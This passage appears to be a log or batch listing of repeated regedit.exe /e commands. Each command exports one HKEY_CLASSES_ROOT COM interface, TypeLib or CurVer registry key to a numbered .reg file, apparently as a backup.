/e "81.reg" "HKEY_CLASSES_ROOT\Interface\{CDDE3804-2064-11CF-867F-00AA005FF34A}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "82.reg" "HKEY_CLASSES_ROOT\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "83.reg" "HKEY_CLASSES_ROOT\Interface\{D4E0F020-720A-11CF-8136-00AA00C14959}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "84.reg" "HKEY_CLASSES_ROOT\Interface\{D3F22039-E3CF-4FC4-9A30-426A46056B8C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "85.reg" "HKEY_CLASSES_ROOT\Interface\{D3F22039-E3CF-4FC4-9A30-426A46056B8C}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "86.reg" "HKEY_CLASSES_ROOT\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "87.reg" "HKEY_CLASSES_ROOT\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "88.reg" "HKEY_CLASSES_ROOT\Interface\{B32C099E-C5D8-4E7C-9563-3D574C42C2FE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "89.reg" "HKEY_CLASSES_ROOT\Interface\{B32C099E-C5D8-4E7C-9563-3D574C42C2FE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "90.reg" "HKEY_CLASSES_ROOT\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "91.reg" "HKEY_CLASSES_ROOT\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "92.reg" "HKEY_CLASSES_ROOT\Interface\{B5ADE81E-0E61-4FE1-81C6-C333E4FFE0F1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "93.reg" "HKEY_CLASSES_ROOT\Interface\{B58845F4-9970-4D87-A636-169FB82ED642}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "94.reg" "HKEY_CLASSES_ROOT\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "95.reg" "HKEY_CLASSES_ROOT\Interface\{AF45AF49-D6AA-407D-BF87-3912236E9D94}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "96.reg" "HKEY_CLASSES_ROOT\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "97.reg" "HKEY_CLASSES_ROOT\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "98.reg" "HKEY_CLASSES_ROOT\Interface\{B28FA150-0FF0-11CF-A911-00AA0062BB4C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "99.reg" "HKEY_CLASSES_ROOT\Interface\{B28FA150-0FF0-11CF-A911-00AA0062BB4C}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "100.reg" "HKEY_CLASSES_ROOT\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "101.reg" "HKEY_CLASSES_ROOT\Interface\{C0324960-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "102.reg" "HKEY_CLASSES_ROOT\Interface\{BE8F9800-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "103.reg" "HKEY_CLASSES_ROOT\Interface\{BE8F9800-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "104.reg" "HKEY_CLASSES_ROOT\Interface\{C0324960-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "105.reg" "HKEY_CLASSES_ROOT\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "106.reg" "HKEY_CLASSES_ROOT\Interface\{C100BEBD-D33A-4a4b-BF23-BBEF4663D017}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "107.reg" "HKEY_CLASSES_ROOT\Interface\{C093CB63-5EF5-4585-AF8E-4D5637487B57}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "108.reg" "HKEY_CLASSES_ROOT\Interface\{BAECB0BD-A946-4771-BC30-E8B24F8D45C1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "109.reg" "HKEY_CLASSES_ROOT\Interface\{B5DEF5A1-FFB6-4E68-B3D8-A12AC60FDA54}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "110.reg" "HKEY_CLASSES_ROOT\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "111.reg" "HKEY_CLASSES_ROOT\Interface\{BB13B3C3-AF9B-43DB-9DF8-B2F65AA5E21B}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "112.reg" "HKEY_CLASSES_ROOT\Interface\{BE39F3D4-1B13-11D0-887F-00A0C90F2744}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "113.reg" "HKEY_CLASSES_ROOT\Interface\{BC97469F-CB11-4037-8DCE-5FC9F5F85307}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "114.reg" "HKEY_CLASSES_ROOT\Interface\{BB13B3C3-AF9B-43DB-9DF8-B2F65AA5E21B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "115.reg" "HKEY_CLASSES_ROOT\Interface\{8D46C1B6-BBAB-450D-A61F-4DDC898B21D4}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "116.reg" "HKEY_CLASSES_ROOT\Interface\{5007373A-20D7-458F-9FFB-ABC900E3A831}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "117.reg" "HKEY_CLASSES_ROOT\Interface\{4FDC29A1-340B-45FB-90A3-2654D980BEFB}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "118.reg" "HKEY_CLASSES_ROOT\Interface\{4CAC6328-B9B0-11D3-8D59-0050048384E3}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "119.reg" "HKEY_CLASSES_ROOT\Interface\{5007373A-20D7-458F-9FFB-ABC900E3A831}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "120.reg" "HKEY_CLASSES_ROOT\Interface\{507171A9-0D7B-47CA-8DF5-56B23ACDC623}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "121.reg" "HKEY_CLASSES_ROOT\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "122.reg" "HKEY_CLASSES_ROOT\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "123.reg" "HKEY_CLASSES_ROOT\Interface\{476E2969-3B2B-4B3F-8277-CFF6056042AA}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "124.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "125.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "126.reg" "HKEY_CLASSES_ROOT\Interface\{4815E0C3-F66C-4236-BD38-FE3810B54076}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "127.reg" "HKEY_CLASSES_ROOT\Interface\{4A894040-247E-4AFF-BB08-3489E9905235}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "128.reg" "HKEY_CLASSES_ROOT\Interface\{4A894040-247E-4AFF-BB08-3489E9905235}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "129.reg" "HKEY_CLASSES_ROOT\Interface\{49E0DBD1-9440-466C-9C97-95C67190C603}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "130.reg" "HKEY_CLASSES_ROOT\Interface\{5A577640-501D-4927-BCD0-5EF57A7ED175}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "131.reg" "HKEY_CLASSES_ROOT\Interface\{5852F5EC-8BF4-11D4-A245-0080C6F74284}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "132.reg" "HKEY_CLASSES_ROOT\Interface\{55F88896-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "133.reg" "HKEY_CLASSES_ROOT\Interface\{5AF314CF-8849-4A79-A3FC-8DE6625D9E72}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "134.reg" "HKEY_CLASSES_ROOT\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "135.reg" "HKEY_CLASSES_ROOT\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "136.reg" "HKEY_CLASSES_ROOT\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "137.reg" "HKEY_CLASSES_ROOT\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "138.reg" "HKEY_CLASSES_ROOT\Interface\{52027082-0B74-4648-9564-828CC6CB656C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "139.reg" "HKEY_CLASSES_ROOT\Interface\{507171A9-0D7B-47CA-8DF5-56B23ACDC623}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "140.reg" "HKEY_CLASSES_ROOT\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "141.reg" "HKEY_CLASSES_ROOT\Interface\{55F88892-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "142.reg" "HKEY_CLASSES_ROOT\Interface\{55F88890-7708-11D1-ACEB-006008961DA5}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "143.reg" "HKEY_CLASSES_ROOT\Interface\{54613049-40BF-4035-9E70-0A9312C0188D}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "144.reg" "HKEY_CLASSES_ROOT\Interface\{46B89F5A-769D-4792-AD9A-E3755915CBC3}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "145.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF4-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "146.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF3-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "147.reg" "HKEY_CLASSES_ROOT\Interface\{39843BF2-C4D2-41FD-B4B2-AEDBEE5E1900}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "148.reg" "HKEY_CLASSES_ROOT\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "149.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D760-6018-11CF-9016-00AA0068841E}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "150.reg" "HKEY_CLASSES_ROOT\Interface\{3B813CE7-7C10-4F84-AD06-9DF76D97A9AA}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "151.reg" "HKEY_CLASSES_ROOT\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "152.reg" "HKEY_CLASSES_ROOT\Interface\{36DE898D-AD48-40A5-B4B2-123F916BFBAB}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "153.reg" "HKEY_CLASSES_ROOT\Interface\{36DE898D-AD48-40A5-B4B2-123F916BFBAB}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "154.reg" "HKEY_CLASSES_ROOT\Interface\{3580A828-07FE-4B94-AC1A-757D9D2D3056}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "155.reg" "HKEY_CLASSES_ROOT\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "156.reg" "HKEY_CLASSES_ROOT\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "157.reg" "HKEY_CLASSES_ROOT\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "158.reg" "HKEY_CLASSES_ROOT\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "159.reg" "HKEY_CLASSES_ROOT\Interface\{452AC71A-B655-4967-A208-A4CC39DD7949}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "160.reg" "HKEY_CLASSES_ROOT\Interface\{45046D60-08CA-11CF-A90F-00AA0062BB4C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "161.reg" "HKEY_CLASSES_ROOT\Interface\{45046D60-08CA-11CF-A90F-00AA0062BB4C}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "162.reg" "HKEY_CLASSES_ROOT\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "163.reg" "HKEY_CLASSES_ROOT\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "164.reg" "HKEY_CLASSES_ROOT\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "165.reg" "HKEY_CLASSES_ROOT\Interface\{465E787A-0556-452F-9477-954E4A940003}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "166.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "167.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "168.reg" "HKEY_CLASSES_ROOT\Interface\{41A7D760-6018-11CF-9016-00AA0068841E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "169.reg" "HKEY_CLASSES_ROOT\Interface\{4291224C-DEFE-485B-8E69-6CF8AA85CB76}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "170.reg" "HKEY_CLASSES_ROOT\Interface\{4495AD01-C993-11D1-A3E4-00A0C90AEA82}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "171.reg" "HKEY_CLASSES_ROOT\Interface\{4495AD01-C993-11D1-A3E4-00A0C90AEA82}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "172.reg" "HKEY_CLASSES_ROOT\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "173.reg" "HKEY_CLASSES_ROOT\Interface\{81F9B44F-BA3A-4F5D-9B51-090C74A9B3A4}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "174.reg" "HKEY_CLASSES_ROOT\Interface\{81F9B44F-BA3A-4F5D-9B51-090C74A9B3A4}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "175.reg" "HKEY_CLASSES_ROOT\Interface\{7EDF9A92-4750-41A5-A17F-879A6F4F7DCB}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "176.reg" "HKEY_CLASSES_ROOT\Interface\{8284B8A2-A8A8-11D1-A3D2-00A0C90AEA82}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "177.reg" "HKEY_CLASSES_ROOT\Interface\{83C49FF0-B294-11D0-9488-00A0C91110ED}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "178.reg" "HKEY_CLASSES_ROOT\Interface\{83C49FF0-B294-11D0-9488-00A0C91110ED}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "179.reg" "HKEY_CLASSES_ROOT\Interface\{8284B8A2-A8A8-11D1-A3D2-00A0C90AEA82}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "180.reg" "HKEY_CLASSES_ROOT\Interface\{7CD069A0-50AA-11D1-B8F0-00A0C9259304}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "181.reg" "HKEY_CLASSES_ROOT\Interface\{7C85BF5E-DC7C-4F61-839B-4107E1C9B68E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "182.reg" "HKEY_CLASSES_ROOT\Interface\{7AE2A4AD-F2F4-4BA7-98B1-67C96736CD5F}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "183.reg" "HKEY_CLASSES_ROOT\Interface\{7CD069A0-50AA-11D1-B8F0-00A0C9259304}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "184.reg" "HKEY_CLASSES_ROOT\Interface\{7EA23D88-569E-4EFD-9851-A1528A7745F9}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "185.reg" "HKEY_CLASSES_ROOT\Interface\{7EA23D88-569E-4EFD-9851-A1528A7745F9}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "186.reg" "HKEY_CLASSES_ROOT\Interface\{7D6B8796-D75D-4348-A445-6DDE811AF9AC}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "187.reg" "HKEY_CLASSES_ROOT\Interface\{8BF94B48-1E76-4AA3-AB1D-463F49B3E681}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "188.reg" "HKEY_CLASSES_ROOT\Interface\{8BF94B48-1E76-4AA3-AB1D-463F49B3E681}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "189.reg" "HKEY_CLASSES_ROOT\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "190.reg" "HKEY_CLASSES_ROOT\Interface\{8CD444E8-C9BB-49B3-8E38-E03209416131}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "191.reg" "HKEY_CLASSES_ROOT\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "192.reg" "HKEY_CLASSES_ROOT\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "193.reg" "HKEY_CLASSES_ROOT\Interface\{8D076AD6-9B6F-4150-A0FD-5D7E8C8CB02C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "194.reg" "HKEY_CLASSES_ROOT\Interface\{888A5A60-B283-11CF-8AD5-00A0C90AEA82}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "195.reg" "HKEY_CLASSES_ROOT\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "196.reg" "HKEY_CLASSES_ROOT\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "197.reg" "HKEY_CLASSES_ROOT\Interface\{888A5A60-B283-11CF-8AD5-00A0C90AEA82}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "198.reg" "HKEY_CLASSES_ROOT\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "199.reg" "HKEY_CLASSES_ROOT\Interface\{8A64A872-FC6B-4D4A-926E-3A3689562C1C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "200.reg" "HKEY_CLASSES_ROOT\Interface\{8A4A20C2-93F3-44E8-8644-BEB2E3487E84}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "201.reg" "HKEY_CLASSES_ROOT\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "202.reg" "HKEY_CLASSES_ROOT\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "203.reg" "HKEY_CLASSES_ROOT\Interface\{673E8454-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "204.reg" "HKEY_CLASSES_ROOT\Interface\{673E8454-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "205.reg" "HKEY_CLASSES_ROOT\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "206.reg" "HKEY_CLASSES_ROOT\Interface\{6D4B9C3E-CC05-493F-85E2-43D1006DF96A}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "207.reg" "HKEY_CLASSES_ROOT\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "208.reg" "HKEY_CLASSES_ROOT\Interface\{68746729-F493-4830-A10F-69028774605D}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "209.reg" "HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "210.reg" "HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "211.reg" "HKEY_CLASSES_ROOT\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "212.reg" "HKEY_CLASSES_ROOT\Interface\{627EA7B4-95B5-4980-84C1-9D20DA4460B1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "213.reg" "HKEY_CLASSES_ROOT\Interface\{673E8452-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "214.reg" "HKEY_CLASSES_ROOT\Interface\{673E8452-7646-11D1-B90B-00A0C9259304}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "215.reg" "HKEY_CLASSES_ROOT\Interface\{66BB2F51-5844-4997-8D70-4B7CC221CF92}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "216.reg" "HKEY_CLASSES_ROOT\Interface\{74C26041-70D1-11D1-B75A-00A0C90564FE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "217.reg" "HKEY_CLASSES_ROOT\Interface\{737361EC-467F-11D1-810F-0000F87557AA}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "218.reg" "HKEY_CLASSES_ROOT\Interface\{737361EC-467F-11D1-810F-0000F87557AA}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "219.reg" "HKEY_CLASSES_ROOT\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "220.reg" "HKEY_CLASSES_ROOT\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "221.reg" "HKEY_CLASSES_ROOT\Interface\{796A2C2D-5B11-4FB5-9077-56D5E674972B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "222.reg" "HKEY_CLASSES_ROOT\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "223.reg" "HKEY_CLASSES_ROOT\Interface\{6F81EA95-074E-48D4-AA96-62197E0AE96F}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "224.reg" "HKEY_CLASSES_ROOT\Interface\{6F81EA95-074E-48D4-AA96-62197E0AE96F}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "225.reg" "HKEY_CLASSES_ROOT\Interface\{6EA00553-9439-4D5A-B1E6-DC15A54DA8B2}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "226.reg" "HKEY_CLASSES_ROOT\Interface\{70B31271-BC47-4EB8-8074-67D06378D691}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "227.reg" "HKEY_CLASSES_ROOT\Interface\{72B82A24-A598-4E87-895F-CDB23A49E9DC}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "228.reg" "HKEY_CLASSES_ROOT\Interface\{724C1646-E64B-4BBF-8EB4-D45E4FD580DA}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "229.reg" "HKEY_CLASSES_ROOT\Interface\{70B31271-BC47-4EB8-8074-67D06378D691}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "230.reg" "HKEY_CLASSES_ROOT\MSOLAP140ErrorLookup\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "231.reg" "HKEY_CLASSES_ROOT\MSOLAP130ErrorLookup\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "232.reg" "HKEY_CLASSES_ROOT\MSOLAP\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "233.reg" "HKEY_CLASSES_ROOT\MSOLAPUI140.ConnectDialog\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "234.reg" "HKEY_CLASSES_ROOT\MsoTDAddin.Connect\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "235.reg" "HKEY_CLASSES_ROOT\MsoPeopleDataHandler.PeopleDataProvider\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "236.reg" "HKEY_CLASSES_ROOT\MsoPeopleDataHandler.PeopleDataHandler\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "237.reg" "HKEY_CLASSES_ROOT\MSComctlLib.TabStrip\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "238.reg" "HKEY_CLASSES_ROOT\MSComctlLib.Slider\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "239.reg" "HKEY_CLASSES_ROOT\MSComctlLib.SBarCtrl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "240.reg" "HKEY_CLASSES_ROOT\MSComctlLib.Toolbar\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "241.reg" "HKEY_CLASSES_ROOT\MsoEuro.Converter\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "242.reg" "HKEY_CLASSES_ROOT\MSDMine\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "243.reg" "HKEY_CLASSES_ROOT\MSComctlLib.TreeCtrl\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "244.reg" "HKEY_CLASSES_ROOT\Office.QueryConstraints\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "245.reg" "HKEY_CLASSES_ROOT\Office.Query\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "246.reg" "HKEY_CLASSES_ROOT\odc.tablecollection\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "247.reg" "HKEY_CLASSES_ROOT\Office.QueryConstraintsBuilder\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "248.reg" "HKEY_CLASSES_ROOT\Office.StorageServer\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "249.reg" "HKEY_CLASSES_ROOT\Office.Session\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "250.reg" "HKEY_CLASSES_ROOT\Office.Row\CurVer"
C:\Windows\SysWOW64\regedit.exe
/e "251.reg" "HKEY_CLASSES_ROOT\NotificationData"
C:\Windows\SysWOW64\regedit.exe
/e "252.reg" "HKEY_CLASSES_ROOT\mswindowsvideo"
C:\Windows\SysWOW64\regedit.exe
/e "253.reg" "HKEY_CLASSES_ROOT\mswindowsmusic"
